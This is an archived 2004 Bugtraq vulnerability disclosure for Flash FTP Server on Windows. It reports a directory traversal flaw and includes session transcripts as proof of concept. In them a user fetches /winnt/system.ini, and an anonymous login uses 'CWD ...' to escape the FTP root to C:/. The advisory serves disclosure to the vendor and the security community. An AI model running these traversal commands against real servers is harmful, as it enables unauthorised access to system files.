| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 21 Jul 2004 16:31:51 +0800 From: "CoolICE" <CoolICE@...na.com> To: "webmaster" <webmaster@...2soft.com> Cc: "bugtraq" <bugtraq@...urityfocus.com>, "list" <list@...uriteam.com> Subject: Bug@...shFTPd Application: Flash FTP Server Vendors: http://www.net2soft.com/downloads/flashftpserver.exe Version: 1.0(2.1?) Platforms: Windows Bug: Directory Traversal Date: 2004-06-9 Author: CoolICE e-mail: CoolICE#China.com ================ TestCode: C:\>ftp localhost Connected to server. 220 Flash FTP Server v2.1 ready... User (server:(none)): CoolICE 331 Password required for CoolICE. Password: 230 User CoolICE logged in. ftp> get /winnt/system.ini 200 Port command successful. 150 Opening data connection for /winnt/system.ini. 226 File sent ok ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec ftp> -------------------------- C:\>ftp -d localhost Connected to server. 220 Flash FTP Server v2.1 ready... User (Server:(none)): anonymous ---> USER anonymous 331 Password required for anonymous. Password: ---> PASS CoolICE@...na.com 230 User anonymous logged in. ftp> pwd ---> XPWD 257 "/C:/inetpub/ftproot/" is current directory. ftp> cd / ---> CWD / 501 CWD failed. No permission ---> CWD .. 501 CWD failed. No permission ftp> cd ... ---> CWD ... 250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory. ftp> cd / ---> CWD / 501 Cannot accept relative path using dot notation ftp> pwd ---> XPWD 257 "/C:/" is current directory.
Powered by blists - more mailing lists